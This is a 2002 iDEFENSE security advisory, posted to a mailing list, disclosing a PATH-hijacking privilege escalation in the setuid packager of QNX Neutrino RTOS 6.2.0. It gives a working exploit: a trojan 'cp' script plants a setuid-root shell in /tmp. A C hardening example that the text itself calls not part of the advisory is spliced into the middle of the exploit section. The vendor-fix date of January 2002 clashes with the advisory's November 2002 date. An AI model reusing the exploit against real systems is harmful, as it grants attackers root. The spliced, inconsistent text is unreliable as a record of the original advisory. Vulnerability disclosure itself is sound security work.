From: David Endler (dendler_at_idefense.com)
Date: Fri Nov 08 2002 - 15:04:06 CST



    iDEFENSE Security Advisory 11.08.02b:
    http://www.idefense.com/advisory/11.08.02b.txt
    Non-Explicit Path Vulnerability in QNX Neutrino RTOS
    November 8, 2002

    I. BACKGROUND

    QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time
    operating system designed for use in embedded systems. "Companies
    worldwide like Cisco, Delphi, Siemens, Alcatel and Texaco depend on
    the QNX technology for network routers, medical devices, intelligent
    transportation systems, safety and security systems, next-generation
    robotics, and other mission-critical applications. In addition, QNX
    forms the core for Ford Motor Co.'s Lincoln Aviator IAV, an
    engineering concept vehicle. The new system supports the development
    of next-generation in-car communications, infotainment, and
    telematics applications." More information is available at
    http://www.qnx.com/products/ps_neutrino .

    II. DESCRIPTION

    Because the setuid-root application packager in QNX executes external
    programs by bare name rather than by full path, the binaries it runs are
    resolved through the caller's PATH, and local attackers can potentially
    obtain root privilege. The following is a sample exploit (with comments):

    The packager will at one point call the copy binary (cp). The first
    step is to create a tainted copy command and ensure it is executable.
    This copy command will copy a shell to /tmp and give the shell setuid
    privilege:

    $ cat > cp <<EOF
    > #!/bin/sh
    > /bin/cp /bin/sh /tmp/sh
    > chmod 4755 /tmp/sh
    > EOF
    $ chmod 755 cp

    The attacker then modifies the PATH environment variable to search
    the current working directory before anything else:

    $ PATH=$PWD:$PATH

    The attacker now creates a directory and calls the packager on that
    created directory:

    $ mkdir temp
    $ packager temp
    ...

    The packager will ask a number of questions. When the procedure is
    complete, a root shell will be waiting for the attacker:

    $ ls -l /tmp/sh
    -rwsr-xr-x 1 root 100 153908 May 11 05:36 /tmp/sh
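    As an added example that is not part of the advisory or of QNX's code, the pattern a setuid-root program such as the packager should use instead: exec helpers by absolute path under an environment the program builds itself, so the caller's PATH never decides what runs. The function names are this example's own, and it assumes a POSIX system with /bin/cp and /bin/sh.

```c
/* Added example (not QNX's or iDEFENSE's code): how a setuid program should
 * invoke a helper such as cp. A bare name is resolved through the caller's
 * PATH; a privileged program must exec an absolute path under its own env. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* The vulnerable shape: "cp" is looked up in whatever PATH the caller set
 * (and the string is shell-injectable). Shown for contrast; never called. */
int copy_vulnerable(const char *src, const char *dst) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "cp %s %s", src, dst);
    return system(cmd);
}

/* A privileged exec accepts absolute command paths only. */
int is_absolute_command(const char *cmd) {
    return cmd != NULL && cmd[0] == '/';
}

/* Run argv[0] with a fixed, minimal environment. execve() ignores PATH for
 * an absolute path, but the child and anything it spawns inherit the
 * environment, so the caller's PATH, IFS and LD_* must not reach them.
 * Returns the child's exit status, or -1 (errno set) on rejection/failure. */
int run_with_trusted_env(char *const argv[]) {
    static char *const trusted_env[] = { "PATH=/bin:/usr/bin", NULL };
    if (argv == NULL || !is_absolute_command(argv[0])) {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, trusted_env);
        _exit(127); /* exec failed; never fall back into the parent's code */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened counterpart of copy_vulnerable(): absolute path, trusted env. */
int copy_hardened(const char *src, const char *dst) {
    char *const argv[] = { "/bin/cp", (char *)src, (char *)dst, NULL };
    return run_with_trusted_env(argv);
}
```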

    III. ANALYSIS

    Local attackers who exploit this vulnerability can potentially gain
    total control over a targeted system. Because exploitation must be
    done locally, it is less likely that damage can be done quickly or in
    a widespread fashion. Still, for organizations that make use of QNX,
    insider threat remains a real danger.

    IV. DETECTION

    QNX Neutrino RTOS 6.2.0 is affected. Re-create the above-described
    exploit scenario to determine the susceptibility of an RTOS
    implementation.

    V. WORKAROUND

    Use the command chmod -s `which packager` to remove the setuid bit
    from the packager binary.

    VI. VENDOR FIX

    QNX Neutrino RTOS 6.2.1, which is slated to be released in January
    2002, should fix this vulnerability. According to QNX, concerned
    customers can contact their sales rep for an advance copy.
     
    VII. CVE INFORMATION

    The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
    assigned the identification number CAN-2002-1239 to this issue.

    VIII. DISCLOSURE TIMELINE

    10/02/2002 Issue disclosed to iDEFENSE
    10/31/2002 QNX notified (support@qnx.com)
    10/31/2002 iDEFENSE clients notified
    11/01/2002 Response received from Marcin Dzieciol (marcind@qnx.com)
    11/07/2002 Response received from Rodney Dowdell
    11/08/2002 Phone conversation with Barry Faubert, Tech Support
    11/08/2002 Public disclosure

    IX. CREDIT

    Texonet (http://www.texonet.com) discovered this vulnerability.

    Get paid for security research
    http://www.idefense.com/contributor.html

    Subscribe to iDEFENSE Advisories:
    send email to listserv@idefense.com, subject line: "subscribe"

    About iDEFENSE:

    iDEFENSE is a global security intelligence company that proactively
    monitors sources throughout the world from technical
    vulnerabilities and hacker profiling to the global spread of viruses
    and other malicious code. Our security intelligence services provide
    decision-makers, frontline security professionals and network
    administrators with timely access to actionable intelligence
    and decision support on cyber-related threats. For more information,
    visit http://www.idefense.com.

    -dave

    David Endler, CISSP
    Director, Technical Intelligence
    iDEFENSE, Inc.
    14151 Newbrook Drive
    Suite 100
    Chantilly, VA 20151
    voice: 703-344-2632
    fax: 703-961-1071

    dendler@idefense.com
    www.idefense.com
